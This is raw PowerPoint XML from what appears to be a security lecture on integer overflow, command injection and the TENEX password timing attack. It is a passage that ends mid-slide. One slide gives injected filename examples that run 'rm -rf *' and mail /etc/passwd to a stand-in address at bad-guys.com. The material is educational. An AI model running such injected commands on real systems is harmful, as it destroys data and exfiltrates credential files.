        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If arithmetic results exceed maximum integer size, computer stores an incorrect value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g., two unsigned 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> each with value 40,000 multiplied and stored into another 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, result in 4096.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Feed a program large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to cause integer overflow, then program may allocate a too-small buffer based on arithmetic result, hence enabling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> buffer overflow attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33596005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D:\b\b4\IBM\09-26.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="321341" y="1757210"/>
            <a:ext cx="8483600" cy="3076575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Injection Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4522840"/>
            <a:ext cx="8305800" cy="2295832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider this program that asks for names of source and destination files, builds a command line string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to execute it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> xyz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>works fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> xyz; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</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rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</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rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>after file copy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> xyz; mail snooper@bad-guys.com &lt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file to snooper </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file is encrypted, but at least the salt numbers are revealed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16249421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Tenex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Password Checking</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Tenex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – early 70’s, BBN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most popular system at universities before UNIX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thought to be very secure, gave “red team” all the source code and documentation (want code to be publicly available, as in UNIX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In 48 hours, they figured out how to get every password in the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here’s the code for the password check:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; 8; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userPasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] != </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>realPasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		    go to error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How many combinations of passwords?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,assuming each char in password has 256 choices?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wrong!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6800967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394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defeating Password Checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1799303"/>
            <a:ext cx="8915400" cy="4827639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Tenex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> used VM, and it interacts badly with the above code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Key idea: force page faults at inopportune times to break passwords quickly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Arrange 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> char in string to be last char in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>page, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>rest on next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Then arrange for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> char to be in memory, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the rest on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>disk (e.g., ref lots of other pgs, then ref 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> page)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>			     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>a|aaaaaa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> |</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> page in memory| page on disk </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Time password check to determine if first character is correct!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If fast, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> char is wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If slow, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> char is right, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>fault, one of the others wrong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>So try all first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>chars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, until one is slow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Repeat with first two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>chars </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in memory, rest on disk </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Only 256 * 8 attempts to crack passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Fix is easy, don’t stop until you look at all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>chars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241248430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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{30A44F73-790E-415D-828E-0D92F9ACB296}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="442452"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>The TENEX – password problem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25605" name="Picture 5" descr="C:\B\b4\JPG\foo\9-12.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488276" y="1861225"/>
            <a:ext cx="8029422" cy="4070355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25606" name="Rectangle 6"/>
          <p:cNvSpPr>
